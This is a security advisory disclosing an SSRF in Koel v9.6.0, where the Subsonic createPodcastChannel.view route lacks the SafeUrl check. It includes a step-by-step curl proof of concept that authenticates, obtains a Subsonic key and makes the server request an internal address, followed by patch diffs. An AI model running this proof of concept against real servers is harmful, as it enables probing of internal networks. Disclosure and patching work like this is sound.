PT-2026-60384 · Packagist · Phanan/Koel
CVE-2026-54492
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Published
2026-07-15
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Updated
2026-07-15
CVSS v3.1
4.3
Medium
| Vector | AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N |
Summary
Koel
v9.6.0 protects the regular podcast subscription API with SafeUrl, but the Subsonic-compatible createPodcastChannel.view route does not apply the same protection. An authenticated user can supply a private URL and cause Koel to fetch it server-side during podcast parsing.This was validated against
v9.6.0 (352ea5ec27fa22294da8fb6beacb3d5552f0d09c) using the official phanan/koel:9.6.0 image.This is distinct from
GHSA-7j2f-6h2r-6cqc, which fixed unsafe episode enclosure URLs in versions <= 9.3.4. The issue here is a newer validation gap in the Subsonic route itself, still present in v9.6.0.Details
SafeUrl protects the regular podcast API only
The regular podcast subscription path validates the feed URL with
SafeUrl:app/Http/Requests/API/Podcast/PodcastStoreRequest.php
php
return [
'url' => ['required', 'url', new SafeUrl()],
];The Subsonic-compatible route does not:
routes/subsonic.phpcreatePodcastChannel.viewapp/Http/Requests/Subsonic/CreatePodcastChannelRequest.php
php
return [
'url' => ['required', 'string', 'url'],
];That creates the same kind of trust-boundary mismatch as the radio issue: the main API rejects private targets, while the compatibility route accepts them.
The URL is fetched immediately by the podcast parser
The attacker-controlled URL is used by the podcast service during channel creation:
app/Http/Controllers/Subsonic/CreatePodcastChannelController.phpapp/Services/Podcast/PodcastService.php
PodcastService::addPodcast() calls:php
$parser = $this->createParser($url);and
createParser() resolves to:php
return Poddle::fromUrl($url, 5 * 60, $this->client);This means the SSRF happens as part of the channel creation flow itself. No separate playback step is needed.
This bypasses Koel's intended SSRF control for podcast URLs
Koel already added
SafeUrl to the regular podcast API and has already published a podcast-related SSRF advisory. The Subsonic route does not reuse that same control, so it reintroduces a server-side fetch primitive for private destinations.PoC
The following steps were validated against the official
phanan/koel:9.6.0 image.- Authenticate and obtain an API token:
bash
API TOKEN=$(
curl -sS -X POST http://127.0.0.1:18081/api/me
-H 'Content-Type: application/json'
--data '{"email":"admin@koel.dev","password":"KoelIsCool"}'
| python3 -c 'import json,sys; print(json.load(sys.stdin)["token"])'
)- Obtain the user's Subsonic API key:
bash
SUBSONIC KEY=$(
curl -sS http://127.0.0.1:18081/api/data
-H "Authorization: Bearer $API TOKEN"
| python3 -c 'import json,sys; print(json.load(sys.stdin)["current user"]["subsonic api key"])'
)- Prepare an internal-only target URL. In my validation, I used a host-side RSS fixture reachable from the container through the Docker bridge:
bash
TARGET URL="http://172.17.0.1:18090/feed.xml?run=1"- Confirm the regular web API blocks the URL:
bash
curl -i -X POST http://127.0.0.1:18081/api/podcasts
-H "Authorization: Bearer $API TOKEN"
-H 'Accept: application/json'
-H 'Content-Type: application/json'
--data "{"url":"$TARGET URL"}"Expected result:
- HTTP
422 - Error includes
The url must point to a public URL.
- Trigger the Subsonic route with the same URL:
bash
curl -i -G http://127.0.0.1:18081/rest/createPodcastChannel.view
--data-urlencode "apiKey=$SUBSONIC KEY"
--data-urlencode 'f=json'
--data-urlencode "url=$TARGET URL"Expected result:
- HTTP
200 - JSON includes
"status":"ok"
- Confirm the server-side request happened by checking the internal HTTP service logs.
During validation, the local HTTP test server received
HEAD and GET requests for /feed.xml?run=1.Impact
An authenticated user can make Koel send server-side HTTP requests to internal destinations that are intentionally blocked by the main web API.
Validated impact:
- SSRF to loopback, Docker-bridge, and RFC1918 HTTP destinations reachable from the Koel server
- Internal service discovery and request execution through the podcast parser
Generic response-body exfiltration was not validated through this exact route. The confirmed impact is SSRF-based internal request execution.
Remediation
The Subsonic podcast request validator should apply
SafeUrl, and the parser entry point should reject unsafe targets as defense in depth.Suggested patch for
app/Http/Requests/Subsonic/CreatePodcastChannelRequest.php:diff
diff --git a/app/Http/Requests/Subsonic/CreatePodcastChannelRequest.php b/app/Http/Requests/Subsonic/CreatePodcastChannelRequest.php
--- a/app/Http/Requests/Subsonic/CreatePodcastChannelRequest.php
+++ b/app/Http/Requests/Subsonic/CreatePodcastChannelRequest.php
@@
namespace AppHttpRequestsSubsonic;
use AppHttpRequestsRequest;
+use AppRulesSafeUrl;
@@
public function rules(): array
{
return [
- 'url' => ['required', 'string', 'url'],
+ 'url' => ['required', 'string', 'url', new SafeUrl()],
];
}
}Suggested defense-in-depth patch for
app/Services/Podcast/PodcastService.php:diff
diff --git a/app/Services/Podcast/PodcastService.php b/app/Services/Podcast/PodcastService.php
--- a/app/Services/Podcast/PodcastService.php
+++ b/app/Services/Podcast/PodcastService.php
@@
private function createParser(string $url): Poddle
{
+ if (!$this->network->isSafeUrl($url)) {
+ throw FailedToParsePodcastFeedException::create($url);
+ }
+
return Poddle::fromUrl($url, 5 * 60, $this->client);
}
}Fix
SSRF
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Affected Products
Phanan/Koel